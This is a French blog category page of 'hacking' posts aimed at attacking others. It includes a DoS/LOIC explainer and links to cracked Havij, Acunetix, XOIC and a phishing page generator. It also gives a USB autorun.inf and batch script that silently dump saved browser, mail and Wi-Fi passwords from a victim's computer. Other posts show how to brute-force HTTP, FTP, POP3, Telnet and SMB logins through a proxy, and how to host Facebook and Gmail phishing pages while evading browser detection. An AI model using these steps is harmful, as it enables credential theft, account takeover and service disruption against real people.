hacking - tuto-informatique.seb30.overblog.com
Overblog Suivre ce blog
Administration Créer mon blog
tuto-informatique.seb30.overblog.com

tuto et astuce informatique,n'hesitez pas a faire un don pour le travail

Articles avec #hacking catégorie

Les attaques DoS (LOIC)

Publié le 29 Novembre 2014 par seb dans hacking

Le déni de service (DoS) est une des attaques les plus puissants utilisés par les pirates pour nuire à une entreprise ou organisation. Ne confondez pas une attaque DOS avec DOS, le système d'exploitation de disque développé par Microsoft. Cette attaque est l'une des plus dangereuses attaques cybernétiques. Il provoque les interruptions de service et la perte de millions, en fonction de la durée d'attaque. Au cours des dernières quelques années, l'utilisation de l'attaque a augmenté en raison de la disponibilité des outils gratuits. Cet outil peut être bloqué facilement en ayant un bon pare-feu. Mais une attaque DOS répandue et intelligent peut contourner la plupart des restrictions. Dans ce post, nous allons voir plus sur l'attaque DOS, ses variantes, et les outils qui sont utilisés pour effectuer l'attaque.

Qu'est-ce une attaque par déni de service?


Une attaque DOS est une tentative de faire un système ou serveur indisponible pour les utilisateurs légitimes et, enfin, de prendre le service vers le bas. Ceci est réalisé en noyant de demande de file d'attente du serveur . Après cela, le serveur ne sera pas en mesure de traiter les demandes des utilisateurs légitimes.



DDOS ou Distributed Denial of Service Attack


Ce est la version compliquée dans laquelle de nombreux systèmes d'attaque sont impliqués. Dans les attaques DDOS, de nombreux ordinateurs commencer à exécuter des attaques DOS sur le même serveur cible. Comme l'attaque DOS est répartie sur un grand groupe d'ordinateurs, il est connu comme un déni de service distribué attaque.


Pour effectuer une attaque DDOS, les attaquants utilisent un réseau de zombies, qui est un groupe d'ordinateurs infectés sur lequel l'attaquant a silencieusement installées l'outil attaque DOS. Chaque fois qu'il veut effectuer DDOS, il peut utiliser tous les ordinateurs de réseau de zombies pour effectuer l'attaque.


En termes simples, quand un système de serveur est inondé de fausses demandes provenant de plusieurs sources (potentiellement des centaines de milliers), il est connu comme une attaque DDOS. Dans ce cas, le blocage d'une adresse IP unique ou quelques-uns ne fonctionne pas. Les plus de membres dans le réseau de zombies, plus puissant, il l'attaque. Pour la création du réseau de zombies, les pirates utilisent généralement un cheval de Troie.


Il existe essentiellement trois types d'attaques DDOS:


Couche application attaque DDOS
Protocole attaque DOS
Basé sur le volume attaque DDOS
Couche application attaque DDOS: attaques de la couche applicative DDOS sont des attaques qui ciblent Windows, Apache, OpenBSD, ou d'autres vulnérabilités logicielles pour effectuer l'attaque et planter le serveur.


Protocole attaque DDOS: A attaques DDOS protocole est une attaque DOS sur le niveau du protocole. Cette catégorie comprend Synflood, Ping of Death, et plus encore.


DDOS attaque Volume-: Ce type d'attaque comprend inondations ICMP, UDP, inondations et d'autres types d'inondations effectuées via des paquets contrefaits.


Il existe de nombreux outils disponibles gratuitement qui peuvent être utilisés pour inonder un serveur et effectuer une attaque. Quelques outils soutiennent également un réseau de zombies d'effectuer des attaques DDOS.


DOS Outils Attaque gratuites




1. LOIC (Low Orbit Ion Canon)


LOIC est l'un des outils les plus populaires DOS attaquant librement disponibles sur Internet. Cet outil a été utilisé par le populaire groupe de hackers Anonymous contre les réseaux de nombreuses grandes entreprises de l'année dernière. Anonyme a non seulement utilisé l'outil, mais aussi demandé aux internautes de se joindre à leur attaque DDoS via IRC.


Il peut être utilisé simplement par un seul utilisateur sur les petits serveurs. Cet outil est vraiment facile à utiliser, même pour un débutant. Cet outil effectue une attaque DOS en envoyant UDP, TCP, ou des requêtes HTTP au serveur de la victime. Vous avez seulement besoin de connaître l'URL de l'adresse IP du serveur et l'outil fera le reste.

Les attaques DoS (LOIC)
Lire la suite

flyff res editor

Publié le 26 Novembre 2013 par SEB dans hacking

https://mega.co.nz/#!WsA30BhL!GIMT4hliyle7wWJ0rfowgz4-iUpyIK0nthsHnJwhrgo

https://mega.co.nz/#!WsA30BhL!GIMT4hliyle7wWJ0rfowgz4-iUpyIK0nthsHnJwhrgo

petit programme afin de modifier le code source du jeu ,beaucoup de possibilite pour celui qui connait le language c++

attention le programme doit etre execute en tant qu administrateur

Lire la suite

acunetix 8 plus crack

Publié le 18 Mai 2013 par SEB dans hacking

acunetix 8 plus crack
Lire la suite

bactrack 5 gnome 32 et 64 bit

Publié le 1 Mai 2013 par SEB dans hacking

bactrack 5 gnome 32 et 64 bit
Lire la suite

aspirateur de mot de passe

Publié le 24 Avril 2013 par SEB dans hacking

Salut à tous !!!
Je vais vous montrer comment créer un aspirateur de mots de passe !!!
Vous aurez juste à brancher la clef usb sur l'ordinateur de votre victime et à cliker sur scan passwords !!!


matériel :
clef usb
un pc avec une connexion internet


Etape 1


Les logiciels :


MessenPass : http://www.nirsoft.net/utils/mspass.zip
Mail PassView : http://www.nirsoft.net/utils/mailpv.zip
Chromepass : http://www.nirsoft.net/utils/chromepass.zip
IE passview : http://www.nirsoft.net/utils/iepv.zip
Passwordfox : http://www.nirsoft.net/utils/passwordfox.zip
Proctected storage passview : http://www.nirsoft.net/utils/pspv.zip
Network Password Recovery : http://www.nirsoft.net/utils/netpass.zip
WirelessKeyView : http://www.nirsoft.net/utils/wirelesskeyview.zip
WebBrowserPassView : http://www.nirsoft.net/utils/webbrowserpassview.zip


Etape 2 :


Télécharger tous les logiciels suivants et placer tous les fichiers .exe à la racine de votre clef usb !!! Ne pas mettre dans un fichier


Etape 3 :


Ouvrer le bloc note de windows et copier les lignes suivantes :


[autorun]
open = launch.bat
ACTION = Scan Passwords


et enregistrer le fichier dans la racine de la clef en le nommant autorun.inf


Etape 4 :


Ouvrer un autre bloc note et copier ceci :


start ChromePass.exe /stext CHromePass.txt
start iepv.exe /stext iepv.txt
start mailpv.exe /stext mailpv.txt
start mspass.exe /stext mspass.txt
start netpass.exe /stext netpass.txt
start PasswordFox.exe /stext PasswordFox.txt
start pspv.exe /stext pspv.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start WebBrowserPassView.exe /stext WebBrowserPassView.txt


Etape 5 :

Une fois que les 9 fichiers (.exe) + les deux fichiers (.inf et .bat) sont à la racine de votre clef usb Votre rootkit est prêt !!!




Etape 6 :


Il y a deux cas de figure après ceci...
La plupart du temps, il suffira d'insérer la clef usb et de cliker sur scan passwords sur la petite fenêtre d'ouverture automatique, mais parfois le fichier autorun est désactiver (suivant les ordinateurs). Pas de problèmes ne vous inquiétez pas !!! il suffira de double cliker sur le fichier launch.bat créé précédement à l'intérieur de la clef !!!!
Une fenêtre DOS va s'ouvrir 3 secondes et va disparaître. Des fichiers .txt vont se créés pour chaque logiciel (sur certain ordinateur il n'y a pas google chrome a part exemple donc il y aura bien un fichier mais rien a l'intérieur (c'est normal))




Voilà j'espère que ce tuto vous à plu ...
si vous avez des questions n'hésitez pas ...


Tuto pris de l'ancien HN d'Adrit44

aspirateur de mot de passe
Lire la suite

tuto brutus

Publié le 24 Avril 2013 par SEB dans hacking

Il permet de cracker plusieur type de pass .. (HTTP, FTP, TELNET, NetBios, POP)
Il permet aussi de passer par un proxy affait de ne pas se faire reperrer apres de multiple essais de pass.
Dans ce tuto, je vais vous expliquer comment utliser ces options, configurer le proxy (recommender), etc ..

Configuration du Proxy
Pour configurer le proxy que vous allez utiliser pour vous connecter au server, vous devez tout d'abor cocher la case "Use Proxy".
Ensuite, cliquer sur "Definite" afint de régler les options du Proxy.
Quand vous aurez cliquer, cette fenêtre devrais aparaitre ;

Dans cette fêntre rentrer ces informations ;
Proxy Tye: Laissez "SOCKS (V5)"
Dans Proxy Adress, inscriver l'adresse de votre server proxy.
En dessous, inscriver le port de votre server Proxy (1080 par défaut).
Si votre server proxy vous demande un login et une mot de pass, cocher "Proxy requires authentifiquation".
Ensuite, inscriver vos login et pass dans les casse respectives.
Configuration des login
Pour cracker un pass, vous avez tout d'abor besoin du Login qui va avec ce pass (Logique) ..
Dans PRESQUE tout les cars, l'authentifiquation nécéssite un login.
Brutus fournis plusieur options pour sélectionner ce login !
Voici une Capture d'écran des options Login de Brutus ;

Allez tout d'abor dans dans la box "Authentification Options" !
Si le server n'utilise pas de login (Tres rare), déchocher "User UserName"
Si vous connaisez le login, cocher "Use Username", et "Single User", ensuite inscriver le login dans "UserID".
Si vous ne connaisez pas le login, cocher simplement "User UserName" et cliquer ensuite sur "Browse" pour sélectionner le fichier.txt contenant les suposser logins ..
Configuration des pass et méthodes de crack
Brutus utilise plusieur méthode pour cracker ..
Capture d'écran des options de crack de Brutus

Il peu utilise la "Word List", un fichier remplit de mot de pass que le cracker va asseyer.
Le "Brute Forcing" (Force Brute) qui consiste à asseyer tout les combinaisont possible à partir d'une chaine de caracteres ..
Ou encore le "Combo" qui est un peu comme la word liste mais avec les login dans le fichier texte


Exemple de combo: admin:pass
Pour crée un fichier texte qui servira à la méthode "Combo", vous devez inscrire le suposser login ensuite deux point (:), et le suposser pass.
Pour cracker avec la méthode "Word List", crée tout d'abor un fichier texte dans lequel vous écrire sur chaque ligne un mot de pass que le cracker va asseyer.
Ensuite sélectionne cette même méthode dans "Pass Mode", et sélectionner le chemin d'access à votre fichier texte en cliquant sur "Browse".
Pour utilise la méthode "Combo", sélectionner celui-ci dans "Pass Mode" crée votre fichier contenant les pass & login, et sélectionner le tout comme le précédent en cliquant sur "Browse" !
Pour utilise le "Brute Forcing", séléctionner cette méthode dans "Pass Mode", et cliquer sur "Range" afin de définir les options de Brute Forcing (Carectere, Nombre Max Min de caracteres dans les pass à asseyer, ect ...)
Une fois que vous aurez cliquer sur "Range" vous obtiendrez le menu "Brute Force Generation" qui ce présente comme ceci ;

Dans la rangée de bouton type Radio, sélectionner les caratere qui servirons à constituer les pass à asseyer.
Dans "Min lenght" sélectionnner la longueur Minimale du pass
Et enfin dans "Max Length" sélectionner la longuer maximalle du pass.
Récuperation des pass cracker
Une fois que votre crack est fini, et si la recherche à été fructueuse, vous devriez obtenir les pass de votre "victime" dans la box "Positive Authentification Result" dans cette présentation la ;

Cracker un pass HTTP (Htaccess)
Un pass HTTP ou Htaccess est que le server vous demande pour avoir access à un dossier du site.
Si vous voulez rentrer dans un dossier sécuriser, vous obtiendre une fenêtre comem celle ci dessous vous demandans votre login & pass.

Il est donc impossible de rentrer sur cette partie du site, sauf si on connait le pass ou bien si on utilise un cracker ;-).
Pour cracker se type de pass ouvrer Brutus et suiver ces instructions :
Dans type, sélectionner "HTTP (Basic Auth)".
Dans la case "Target", inscriver le site de votre vitctime sans le http:// + le dossier proteger par le Htaccess !
Exemple: Si le site est "http://www.pigeon.com" et le dossier est "admin", inscriver dans "Target" : www.pigeon.com/admin/.
Dans la partie "Connections Options", remplisser le case comme ceci.
Dans"Port", inscriver le port du server http (80 Par défaut).
"Laissez connection" et "Time Out" comme il sont.
Ne changer rien dans "HTTP (Basic) Options"
Et enfin, si vous le désirer, configurer votre proxy comme indiquer si dessus !
Dans "Authentification Options", configurer les login et la méthode de crack comme expliquer ci-dessus dans et Cliquer sur "Start".


Cracker un Pass FTP (File Transfert Protocol)
Pour obtenir le pass d'un utilisateur sur un server FTP, nous devons configurer notre Cracker de cette facon :
Dans "Type" on sélectionner FTP.
Dans target, on mais l'adresse ip ou le nom du server FTP ...
Exemple: si le site est www.pigeon.com, le nom du server ftp à de forte change d'être ftp.pigeon.com ...
Dans les options de connection ("Connection Options") on laisse le port par défaut (21)
On ne touche pas à "Connections" ni à "Time Out" et si on veux, on configure son proxy comme indiquer ci-dessus
Ensuite, on laisse se qui se trouve dans "FTP Options" par défaut.
On regler le login et les méthode de crack comme expliquer au dessus, et on clique sur Start !


Cracker un pass E-Mail (POP)
Pour cracker le pass d'une adresse E-mail, vous allez devoir suivre ces instructions ;
Dans "Type", sélectionner POP3
Dans "Targert" On mais le server POP ..
Exemple: si le mail est pigeon@skynet.be, le server sera pop.skynet.be !
Dans les Options de connection, on laisse le port par défaut (110) et on ne touche pas à "Connections" ni à "Time Out"
On configure son proxy, le login et les méthode de crack comme expliquer si dessus.
On clique sur "Start" ...


Craker un pass Telnet
Pour cracker un pass Telnet, configurer Brutus de cette maniere ;
Dans "Type" sélectionner "Telnet"
Dans "Target" inscriver l'ip ou le nom du server ..
Dans les options de connection, laissez le port part défaut (23), et le bouger ni à "Connection" ni à "Time Out" ...
Configurer votre proxy comme expliquer au dessus.
Laissez ce qui se trouve dans "Telnet Options" par défaut.
Sélectionner les users, et méthode de crack comme expliquer ci-dessus.
Cliquer sur "Start"


Cracker un pass NetBios (SMB)
Dans "Type" on sélectionne (SMB) NetBios
Dans "Target" on inscrit http:// + l'adresse Ip de la victime + Son lecteur
Exemple: Imaginons que l'adresse ip de la victime est 255.255.255.255, que son lecteur est C dans "Target" vous écrirez: http://255.255.255.255/C
Dans les options de connection on laisse le port 139 (Port par défaut d'une session NetBios) ..
Dans les options SMB, cocher "Use NT" si vous utiliser NT et inscriver le domaine.
Dans les options d'authentifiquations, rempliser les login et pass comme je l'ai expliquer plus haut
Cliquer sur "Start"

tuto brutus
Lire la suite

faire sa page de phishing facilement

Publié le 14 Février 2013 par SEB dans hacking

 

facebook,gmail...il ne vous reste plus qu'a l heberger https://mega.co.nz/#!i8JiHTbB!KeT72V-GsGWUR1qcSvO0mRyYA8ZDlddWuoAdOTfxTBU

je vais vous expliquer comment heberger et avoir sa page de phishing

1¤ extraire le fichier sur votre burau

2¤ rendez vous sur le site altervista http://it.altervista.org/

3¤ au dessus de "Il nome del tuo sito" entrer" entrer le nom que vous voulez pour votre page de phishing et validez par prosegui

4¤ allez directement dans le formulaire dans nazione italia et cliquez sur cambia cela vous permettra de choisir le pays et finnissez de remplir le qustionnaire et validez

5¤ allez sur votre boite mail ouvrez un bloc note et et copiez les pour sauvegardez vos codes et l enregistrer sous le nomque vous voulez sur votre bureau ,et activer votre compe vous vous retrouverer sur une page cliquez sur manage files

6¤ ensuite cliquez upload files /select files (ouvrir le dossier exemple recente facebook si vous voulez facebook et selectionnez les 3 fichiers et cliquez ouvrir) pour valider cliquez send files

7¤ maintenant pour voir le resultat cliquez file management faite clic droit sur index.html et copiez l adresse du lien et collez la dans votre fichier ou vous avez mis vos code car c est le lien de votre page de phishing je vous conseille de tester le lien sur internet explorer car google chrome detecte les pages de phishing

,vous juste a copier le lien dans la barre d url et entrer

et pour voir les codes qui sont rentre faites un droit sur log.txt et collez le sur votre fichier avec les autres code car c est le lien de votre page ou arrive les mots de passe je croit que l on ne peut pas faire plus simple ,je vous conseille de videz vos fichier de votre compte quand vous ne l utilser pas car les sites d hebergement verifie et bloque le compte si une page de phishing est decouvert

faire sa page de phishing facilement
Lire la suite

auto phisher maker

Publié le 13 Février 2013 par SEB dans hacking

equivalent a super phisher utile pour creer vos page de phishing ,il vous reste plus qu'a heberger les pages que le logiciel vous creer

https://mega.co.nz/#!G0IzhJKA!dVxZURvTzmb1w8JegKvPh0FhC-h_LqKUlSo_nLW7wmo

auto phisher maker
Lire la suite

XOIC anonymous

Publié le 12 Février 2013 par SEB dans hacking

equivalent a loic plus performant et plus leger

https://mega.co.nz/#!WtIyURrL!CTlSZFHWY3F_qihpbx55BhhKcuV9xy6_EOVpY2w8cD8

XOIC anonymous
Lire la suite

havij pro craqué

Publié le 12 Février 2013 par SEB dans hacking

demarrer en tant qu adminstrateur

https://mega.co.nz/#!y85SAJ7D!Y7VrO0H6iLJ2kIpEAU2IaE-5Ux5QAEjcRuTXNmkQtwc

havij pro craqué
Lire la suite

Afficher plus d'articles

1 2 > >>